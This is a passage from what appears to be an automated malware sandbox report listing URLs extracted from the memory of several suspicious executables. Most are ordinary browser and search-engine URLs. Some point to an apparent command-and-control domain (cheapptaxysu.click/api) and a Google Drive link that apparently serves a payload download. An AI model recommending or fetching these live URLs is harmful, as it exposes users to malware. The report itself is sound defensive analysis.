                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2246262813.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2191032954.00000000011CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/((
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/)
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2264280575.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/2.
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/:-
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/J.
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2139126772.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2139126772.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2317295067.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289585885.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2313639870.00000000011B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api20
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2246110877.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api3TtZ1
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2222819175.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2264280575.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/b.
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/r-
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2190479666.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/api
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore7~
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore8
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433194586.0000017A8AA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreA
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreNB
                    Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441945698.0000017A8AA55000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442579730.0000017A8AA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreZp
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470775814.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoref
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472513340.0000020F23D1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorep
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA57000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441945698.0000017A8AA55000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442579730.0000017A8AA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorerpc
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/upda
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx&
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx2A29%B
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5D15F
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxA34CWk
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433970493.0000017A8AA20000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434174344.0000017A8AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxP5
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxZ
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxb
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxk
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433970493.0000017A8AA20000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2434174344.0000017A8AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxp5
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxpng
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438900467.0000017A8AA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.googiQ
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436801526.0000017A8AA0E000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2435134891.0000017A8AA10000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438784044.0000017A8AA14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2435944336.0000017A8AA09000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2437102144.0000017A8AA11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google
                    Source: 68f6adf5d5.exe, 00000019.00000003.2469893569.0000020F23CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://drive.google.com/uc?id=
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download32hF
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download?FK
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadmYo
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://drive.google.com/uc?id=URL:
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442450151.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2441565056.0000017A8AA17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.googleA
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA39000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1
                    Source: 68f6adf5d5.exe, 00000018.00000003.2537060887.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/SYE
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AA79000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537236286.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                    Source: 68f6adf5d5.exe, 00000018.00000003.2538026232.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2537236286.0000017A8AA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download9
                    Source: 68f6adf5d5.exe, 00000018.00000003.2536901296.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadC
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 